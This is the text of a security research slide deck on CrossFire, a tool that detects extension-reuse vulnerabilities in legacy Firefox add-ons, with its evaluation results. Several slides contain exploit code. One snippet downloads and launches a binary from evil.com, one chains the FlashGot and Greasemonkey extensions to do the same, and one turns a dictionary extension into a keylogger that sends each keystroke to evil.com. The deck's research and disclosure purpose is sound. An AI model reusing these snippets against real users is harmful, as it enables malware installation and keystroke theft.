Automated Detection of Extension-Reuse Vulnerabilities
Ahmet S. BUYUKKAYHAN, William ROBERTSON

Who are we?
• Assistant professor of computer science at Northeastern University in Boston, MA
• Co-directs the NEU Systems Security Lab with Engin Kirda
• Systems, network, and security researcher
• Past winner of DEFCON CTF with Shellphish (a long, long time ago…)

2 Who are we?
• PhD Candidate at Northeastern University
  – Authored peer-reviewed conference and journal papers in top-tier security venues
• Member of the NEU Systems Security Lab

3 Singapore

4 Boston

5 Agenda
• Background
• Extension-Reuse Attacks
• CrossFire & Demo
• Evaluation
• Conclusion

6 Background

7 Browser Extensions
• Add new capabilities and customization to browsers
• ~15K extensions in the Mozilla Add-ons repository
• Popular ones have millions of users
• Mostly written in JavaScript

8 Legacy Firefox Extensions
• Shared JavaScript namespace
  – Extensions can read/write objects or variables of others
  – Can invoke functionality of others
• Shared window
  – Read/write GUI elements
  – Listen to all events
• No privilege separation
  – Full access to filesystem, network…
[Figure: XUL windows and extension JavaScript share one namespace; XPCOM exposes the File System and Network to all of them]

9 Threat Model
• The browser is an attractive target
  – Extension authors are untrusted
• Vulnerable extensions can be exploited
  – "Benign-but-buggy" threat model
• Malicious extensions are a real threat
  – Trick users into installing malicious extensions
  – Powerful ("man-in-the-browser" attacks)
  – Easy to develop, difficult to detect
(Side note: 161 malicious extensions are blocked by Mozilla+)

+ addons.mozilla.org/en-US/firefox/blocked/ – Feb 2016

10 Existing Methods for Protection
• Enforcing browser marketplaces for extensions
  – Automated analysis
  – Human reviews
  – Extension signing
  – "Vetting"
• Extension isolation
  – Least privilege and policy-based enforcement

11 Add-on SDK (a.k.a., Jetpack)
• Introduced in 2009
• Isolates extensions from each other
• Separate content and core scripts
• Implements the principle of least privilege
• But adoption has been slow
  – October 2014: 12.0% of the top 2,000 extensions
  – March 2016: 22.9% of the top 2,000 extensions
• Superseded by WebExtensions (release date in Q3 2016)

12 Extension-Reuse Attacks

13 Attack Model
[Figure: in the Vetting Sandbox the Evil Extension makes no sensitive calls of its own and shows no suspicious behavior; in the Victim's Browser it invokes Extension X and Extension Y, whose code makes the sensitive calls]

14 Impact
• Lack of isolation leaves legacy extensions defenseless against capability leaks
• Attackers can stitch together exploits by abusing capabilities
• The more power vulnerable extensions have, the easier it is for an evil extension

15 Download & Execute Evil Binary
The direct way: the evil extension uses XPCOM itself to fetch a binary and launch it.

    const WebBrowserPersist = Components.Constructor(
        "@mozilla.org/embedding/browser/nsWebBrowserPersist;1",
        "nsIWebBrowserPersist");
    var persist = WebBrowserPersist();
    var targetFile = Components.classes["@mozilla.org/file/local;1"]
        .createInstance(Components.interfaces.nsILocalFile);
    targetFile.initWithPath("evil.bin");
    persist.saveURI("http://evil.com/evil.bin", null, null, null, "", targetFile, null);
    targetFile.launch();

16 Extension-reuse Attack Example
[Figure: Evil Extension → Extension X (Download: Internet → File System) → Extension Y (Execute the downloaded Exe)]

    // Extension X: FlashGot's global download service fetches $url to $path
    var files = [{
        href: $url,
        description: "",
        fname: $path,
        noRedir: true
    }];
    gFlashGotService.download(files);

    // Extension Y: Greasemonkey's preference manager and "open in editor"
    // helper launch whatever path the "editor" preference points at
    var gPrefMan = new GM_PrefManager();
    gPrefMan.setValue("editor", $path);
    GM_util.openInEditor();

17 To Reuse or Not To Reuse
Direct: the evil extension makes the sensitive calls itself (the same code as slide 15, parameterized by $url and $path).

    const WebBrowserPersist = Components.Constructor(
        "@mozilla.org/embedding/browser/nsWebBrowserPersist;1",
        "nsIWebBrowserPersist");
    var persist = WebBrowserPersist();
    var targetFile = Components.classes["@mozilla.org/file/local;1"]
        .createInstance(Components.interfaces.nsILocalFile);
    targetFile.initWithPath($path);
    persist.saveURI($url, null, null, null, "", targetFile, null);
    targetFile.launch();

Reuse: the same effect through Extension X and Extension Y, with no sensitive call in the evil extension's own code (cf. the attack model on slide 13).

    var files = [{
        href: $url,
        description: "",
        fname: $path,
        noRedir: true
    }];
    gFlashGotService.download(files);
    var gPrefMan = new GM_PrefManager();
    gPrefMan.setValue("editor", $path);
    GM_util.openInEditor();

18 Another Example
• A key logger, which sends each key press to evil.com

    // Repurpose a dictionary extension: its Wiktionary lookup URL prefix becomes
    // the exfiltration endpoint, and its keydown handler sends every key
    gd12.dicInline.urlWikPrefix = "http://evil.com/GD12_YOUR_LANG/steal.php?key=";
    gd12.keydownHandler = function(e) {
        gd12.dicInline.lookupWikt(String.fromCharCode(e.which), false, false);
    };
    gd12.init();

[Figure: key presses → Internet → Evil.com]

19 CrossFire

20 CrossFire Overview
[Figure only]

21 DEMO

22 Evaluation

23 Method
• Top 10 most downloaded extensions
  – Manual analysis on the whole set
• Top 2,000 most downloaded extensions
  – Manual analysis on a random set of 323
• Case Study
  – Developed an extension with a cross-extension function call
  – Applied to full review

24 Top 10 Firefox Extensions

Extension Name                     Automated Exploits   Manual Exploits   False Positives   # of Users
(name missing from extraction)     0                    0                 4                 22 M
Video DownloadHelper               0                    15                0                 6.5 M
Firebug                            0                    1                 0                 3 M
NoScript                           2                    5                 2                 2.5 M
DownThemAll!                       0                    5                 0                 1.5 M
Greasemonkey                       1                    3                 2                 1.5 M
Web of Trust                       1                    33                15                1.3 M
Flash Video Down.                  4                    1                 1                 1.3 M
FlashGot Mass Down.                3                    5                 9                 1.3 M
Down. YouTube Videos               0                    2                 1                 1 M

25 Summary of Results
Detected Vulnerabilities – Random Set

                   Manual        Automated
True Positives     255 (73%)     204 (80%)
False Positives     96 (27%)      51 (20%)

[Figure: Positive Vulnerabilities by Attack Type (chart not recovered)]

26 Breakdown of Positive Vulnerabilities

Category               Description                        Share of positive vulnerabilities
Network Access         Open a URI or download a file      66%
Code Execution         Execute binary or JS               16%
File I/O               Read from/write to filesystem      12%
Preference Access      Read/write browser settings        3%
Event Listener Reg.    Key logging events only            3%

27 Performance
• Fast static analysis – ~1 sec on average (per extension)

  Min     Q1      Median   Mean    Q3      Max
  0.05s   0.18s   0.28s    1.06s   0.51s   763.91s

  (The mean is pulled up by a few outliers, as the 763.91s maximum shows; the median extension is analyzed in 0.28s.)

• Fast exploit generation – ~380 secs (~6 mins) on average (per exploit)

  Min   Q1     Median   Mean     Q3       Max
  30s   192s   270s     378.6s   550.8s   2160s

28 Case Study
• ValidateThisWebSite
  – ~50 lines of code
  – No obfuscation or attempt to hide
  – Opens an unnecessary, harmless link

    // Attacker chooses $url; the only "suspicious" thing the extension does is
    // a cross-extension call into NoScript's global object
    noscriptBM.placesUtils.__ns.__global__.ns.loadErrorPage(window[1], $url);

29 Limitations
• CrossFire is not a sound and precise analysis tool
• CrossFire does not handle
  – Inferring dynamic types
  – Prototype-based inheritance
  – String evaluation

30 Mitigation & Detection
• Isolation
• Least privilege
• Secure functionality and data sharing
• Check for extension-reuse vulnerabilities
• Mozilla security team is informed

31 Key Takeaways
• Lack of isolation allows stealthy attacks
• Attackers can easily automate
• More robust isolation, vetting, and analysis required

32 Thank You
